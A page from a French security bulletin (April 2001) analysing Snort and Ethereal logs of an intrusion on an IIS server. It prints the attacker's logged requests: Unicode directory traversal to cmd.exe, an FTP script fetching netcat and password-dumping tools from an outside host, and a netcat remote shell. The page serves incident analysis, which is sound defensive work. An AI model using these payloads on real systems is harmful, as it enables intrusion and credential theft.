Veille Technologique Sécurité - cert devoteam
Veille Technologique Sécurité - cert devoteam
Veille Technologique Sécurité - cert devoteam
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
Avril 2001<br />
La recherche du mot ' GET ' permet de lister les commandes passées en exploitant la vulnérabilité 'UNICODE'<br />
dont nous pouvons constater quelles sont similaires aux commandes précédentes !<br />
strings -a snort-0204@0117.log.gz | find "GET" (les doublons ont été éliminés de cet extrait)<br />
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1<br />
GET /guest/default.asp/..<br />
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\<br />
cmd.exe +cmd1.exe HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+johna2k+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+haxedj00+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+echo+quit+>>ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+ftp+-s:ftpcom HTTP/1.1<br />
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe<br />
?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1<br />
Analyse de niveau "Réseau" (Durée approximative: 4 heures, tableau de synthèse compris)<br />
Pour aller plus en avant, l'analyse doit maintenant porter sur le contenu de chacun des paquets et nécessite donc<br />
l'utilisation d'EtherReal et des mécanismes de filtrages associés mais aussi une bonne 'dose' de patience pour<br />
démêler les fils de l'écheveau !<br />
Sources<br />
Quatre sites dignes d'intérêt sont rapidement identifiés:<br />
www.nether.net, portail d'un fournisseur de comptes Internet gratuits<br />
1Cust162.tnt13.stk3.da.uu.net (213.116.251.162), point d'accès du fournisseur UUNET<br />
freedu-12-26.libertysurf.se (212.139.12.26), point d'accès du fournisseur libertysurf<br />
ip60-156.hksp.net (202.85.60.156), dont le domaine appartient à une société basée à Hong Kong<br />
Notons que les systèmes situés derrière ces deux dernières adresses dynamiques sont totalement contrôlés par<br />
l'attaquant.<br />
Protocoles<br />
Un simple tri sur la colonne 'protocole' permet d'obtenir très rapidement une 'cartographie' des protocoles utilisés.<br />
Ce tri met en évidence la présence de six protocoles -<br />
HTTP, FTP, Diameter, X25 et Socks, Netbios -<br />
dont trois sont, a priori, inattendus. Force est de<br />
constater que les paquets associés proviennent pour<br />
la plupart du site à l'origine des connexions HTTP<br />
transportant les attaques 'VBA Shell' et 'UNICODE':<br />
1Cust162.tnt13.stk3.da.uu.net<br />
Diameter [Paquet 0548]<br />
X25 [Paquet 4030]<br />
L'analyse du contenu des paquets montre que celuici<br />
est en réalité une requête HTTP POST contenant<br />
une attaque ! Rien ne permet d'identifier la cause de<br />
l'erreur: erreur de l'attaquant ou erreur de<br />
journalisation due à Snort.<br />
Socks [Paquets 5995 … 6059]<br />
Ici tout laisse supposer qu'il s'agit d'une connexion<br />
licite ou d'un leurre destiné à masquer le sondage<br />
des accès Socks. Les requêtes sont effectuées depuis<br />
un accès PPP swbell.net.<br />
Un second tri utilisant les fonctionnalités de filtrage permet de suivre le cheminement des connexions HTTP et FTP<br />
(filtre: 'http.request or ftp.request'). Les commandes passées sur le système attaqué via les vulnérabilités 'VBA<br />
Shell' et 'UNICODE' peuvent alors être étudiées en détail.<br />
Attaques<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 44/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE